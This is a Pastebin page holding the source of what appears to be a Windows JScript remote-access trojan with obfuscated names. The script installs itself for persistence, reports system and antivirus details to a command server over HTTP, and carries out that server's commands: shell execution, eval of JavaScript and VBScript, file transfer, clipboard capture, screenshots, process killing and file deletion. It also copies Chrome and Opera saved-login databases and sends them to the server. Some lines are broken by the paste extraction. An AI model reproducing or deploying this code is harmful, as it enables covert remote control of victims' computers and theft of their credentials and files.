Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // ------------ Config --------------- //
- var dyn74 = '100613900'
- var yng97 = 87
- var bgb15 = '%ProgramData%'
- var lwx52 = 300
- // ------------ public var ----------- //
- var wch74 = WScript.CreateObject('WScript.Shell')
- var ftx16 = WScript.CreateObject('scripting.filesystemobject')
- var pcv92 = WScript.CreateObject('msxml2.xmlhttp')
- var syc31 = WScript.CreateObject('WinNTSystemInfo')
- // ------------ private var ----------- //
- var vqs72 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
- var rjb74 = WScript.scriptname
- var eua22 = wch74.specialfolders('Startup') + '\\'
- var bgb15 = wch74.expandenvironmentstrings(bgb15) + '\\'
- var fog32 = '<
- var wnd98,ijo62,bhw07
- // ------------ Code Start ------------ //
- // check -- antvrs on
- if(qbp14() == "88FDB972"){WScript.Quit(0)}
- // check -- antvrs off
- yhp97()
- wnd98 = ''
- wnd98 = oju28 ('is-bekle','')
- ijo62 = wnd98.split(fog32)
- switch(ijo62[0])
- case 'Sleep':
- lwx52 = ijo62[1]
- case 'readtext':
- oju28('txtfile',bjw54(ijo62[1]))
- case 'downfile':
- oju28('filetransfer','BcorpFile' + acu36(ijo62[1]))
- case 'upfile':
- sbx61(ijo62[1] + dyn74 + '/a/' + ijo62[3] + ' ' + ijo62[2] + ijo62[3])
- case 'clip-board':
- oju28('is-clip',krf52())
- case 'excecute':
- sbx61(ijo62[1])
- case 'PlanB':
- pmv64(ijo62[1])
- case 'GetPass':
- tfi63()
- case 'KeyMe':
- oju28('My-Keys','BcorpKey' + bjw54(bgb15 + 'store.txt'))
- case 'enum-driver':
- oju28('is-enum-driver',kpb62())
- case 'enum-faf':
- oju28('is-enum-faf',nio87(ijo62[1]))
- case 'enum-process':
- oju28('is-enum-process',neu62())
- case 'komutcu':
- oju28('komutcu',wja82(ijo62[1]))
- case 'komutcu2':
- oju28('komutcu',bmg86(ijo62[1]))
- kmb95(bgb15+'brat.tmp')
- case 'screen-send':
- egh31(ijo62[1])
- case 'delete':
- kmb95(ijo62[1])
- case 'exit-process':
- apf52(ijo62[1])
- default:
- case 'js-text':
- eval(ijo62[1])
- case 'vbs-text':
- Exec(ijo62[1])
- case 'message':
- fxj92(ijo62[1])
- case 'RenFile':
- baa88(ijo62[1],ijo62[2])
- case 'dizinver':
- bgb15 = wch74.expandenvironmentstrings(ijo62[1]) + '\\'
- }WScript.sleep(lwx52)
- }catch(ult43){}
- }while(true)
- function yhp97(){
- ftx16.CopyFile (WScript.scriptfullname,bgb15 + rjb74)
- function oju28(ijo62,bhw07)
- pcv92['open']('POST', 'http://' + dyn74 + ':' + yng97 + '/' + ijo62, false)
- pcv92.setRequestHeader('user-agent:', yst77())
- pcv92['send'](bhw07)
- var xjc97 = pcv92['responsetext']
- return xjc97
- function yst77()
- var glb39,pks30,swc22,ury87,kpc44
- glb39 = qbp14() + fog32
- glb39 = glb39 + syc31.UserName + fog32
- var luq53 = GetObject('winmgmts:\\\\.\\root\\CIMV2')
- var fjn56 = luq53.ExecQuery('SELECT * FROM Win32_OperatingSystem', 'WQL', 0x10
- 0x20)
- var urf75 = new Enumerator(fjn56)
- var ucq81 = urf75.item()
- ury87 = ucq81.Caption +' '+ ucq81.OSArchitecture
- kpc44 = ucq81.SystemDrive
- var bfs28 = GetObject('winmgmts:\\\\localhost\\root\\securitycenter2')
- var hkk63 = bfs28.ExecQuery('select * from antivirusproduct','WQL', 0)
- var hhc18 = new Enumerator(hkk63)
- var jem99 = hhc18.item()
- pks30 = jem99.displayname
- }catch(ezp32){pks30 = 'Err'
- try{swc22 = wch74.RegRead('HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\Policy\\v2.0\\50727')
- }catch(ezp32){swc22 = '-'
- if(swc22 == '50727-50727'){swc22 = 'True'}
- glb39 = glb39 + ury87 + fog32
- glb39 = glb39 + rjb74 + fog32
- glb39 = glb39 + pks30 + fog32
- glb39 = glb39 + bgb15 + fog32
- glb39 = glb39 + swc22 + fog32
- glb39 = glb39 + 'C' + fog32
- glb39 = glb39 + lwx52 + fog32
- glb39 = glb39 + 'J' + fog32
- return glb39
- function qbp14(){
- var njo83 = luq53.ExecQuery("SELECT * FROM Win32_LogicalDisk Where DeviceID = 'C:'")
- var hhc18 = new Enumerator(njo83)
- var uxx34 = jem99.VolumeSerialNumber
- return uxx34
- function sbx61(dul72)
- wch74['run']('cmd.exe /c '+dul72,0)
- catch(ult43){}
- function pmv64(dul72)
- wch74.Run(dul72,1)
- function fxj92(dul72)
- wch74.Popup(dul72)
- function kpb62()
- var s, n, e, d
- e = new Enumerator(ftx16.Drives)
- s = ''
- e.atEnd()
- e.moveNext())
- { d = e.item()
- s = s + d.DriveLetter+':'+'
- '+d.DriveType+fog32
- return('BcorpDriver' + s)
- function nio87(dul72)
- var fs, f, fc, s, fc1
- s1 = ''
- fs = new ActiveXObject('Scripting.FileSystemObject')
- f = fs.GetFolder(dul72+'\\')
- fc = new Enumerator(f.SubFolders)
- fc.atEnd()
- fc.moveNext())
- s += fc.item()
- s += '
- '+''+'
- '+'d'+'
- '+fog32
- fc1 = new Enumerator(f.files)
- fc1.atEnd()
- fc1.moveNext())
- s1 += fc1.item()
- s1 += '
- '+fc1.item(0).size+'
- '+'f'+'
- return('BcorpFaf'+s+s1)
- function neu62()
- var npf82 = GetObject('WinMgmts:').InstancesOf('Win32_Process')
- var pos85 = ''
- gli28 = new Enumerator(npf82)
- for (
- gli28.atEnd()
- gli28.moveNext())
- var waa83 = gli28.item()
- pos85 += waa83.Name + '
- ' + waa83.ProcessID + '
- ' + waa83.ExecutablePath + fog32
- return('BcorpProccess' + pos85)
- function ekr13(oyg46)
- var wup34 = ''
- wup34 = wup34 + oyg46.StdOut.Readline() + '<Satir>'
- while(
- oyg46.StdOut.AtEndOfStream)
- wup34 = wup34 + oyg46.StdErr.Readline() + '<Satir>'
- oyg46.StdErr.AtEndOfStream)
- return(wup34)
- function wja82(dul72) {
- var oyg46 = wch74.Exec('%comspec% /c ' + dul72)
- while (oyg46.Status == 0)
- WScript.Sleep(1000)
- var vfl33
- while ( (vfl33 = ekr13(oyg46))
- = -1) {
- return('BcorpCmd1'+vfl33)
- function bmg86(dul72) {
- wch74['run']('%com'+'spec% /c '+dul72+' > '+bgb15+'brat.tmp',0)
- WScript.sleep(1000)
- return('BcorpCmd2'+bjw54(bgb15+'brat.tmp'))
- function bjw54(spo66) {
- var fp1 = ftx16.OpenTextFile(spo66, 1, true)
- return fp1.ReadAll()
- function baa88(oldname,newname) {
- sbx61('ren ' + oldname + ' ' + newname)
- function kmb95(dul72)
- ftx16.DeleteFile(dul72)
- ftx16.DeleteFolder(dul72)
- function krf52()
- var hqu92 = new ActiveXObject('htmlfile').parentWindow.clipboardData.getData('text')
- return('BcorpClip'+hqu92)
- function tfi63()
- er0('filetransfer','BcorpPassCh')
- if (ftx16.FileExists(wch74.expandenvironmentstrings('%userprofile%') + '\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data'))
- {sbx61('copy "' + wch74.expandenvironmentstrings('%userprofile%') + '\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"' + ' ' + bgb15 + 'ChDb.sql')
- WScript.Sleep(500)
- oju28('filetransfer','BcorpPassCh' + acu36(bgb15 + 'ChDb.sql'))
- if (ftx16.FileExists(wch74.expandenvironmentstrings('%userprofile%') + '\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data'))
- {sbx61('copy "' + wch74.expandenvironmentstrings('%userprofile%') + '\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data"' + ' ' + bgb15 + 'OpDb.sql')
- oju28('filetransfer','BcorpPassOp' + acu36(bgb15 + 'OpDb.sql'))
- function apf52(dul72)
- sbx61('taskkill /F /T /PID ' + dul72)
- function acu36(pepe) {
- var rfx48 = new ActiveXObject('ADODB.Stream')
- rfx48.Open()
- rfx48.Type = 1
- rfx48.LoadFromFile(pepe)
- var wes77 = rfx48.Read()
- var hym47 = new ActiveXObject('Microsoft.XMLDOM')
- var fbs41 = hym47.createElement('tmp')
- fbs41.dataType = 'bin.base64'
- fbs41.nodeTypedValue = wes77
- return(fbs41.text.replace(/[
- A-Z\d+=\/]/gi, ''))
- function egh31(pori)
- oju28('filetransfer','BcorpImage' + acu36(bgb15 + 'kukuri.bmp'))
- WScript.Sleep(400)
- oju28('transfercomplate')
- function er0()
- {try{}catch(O){}}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement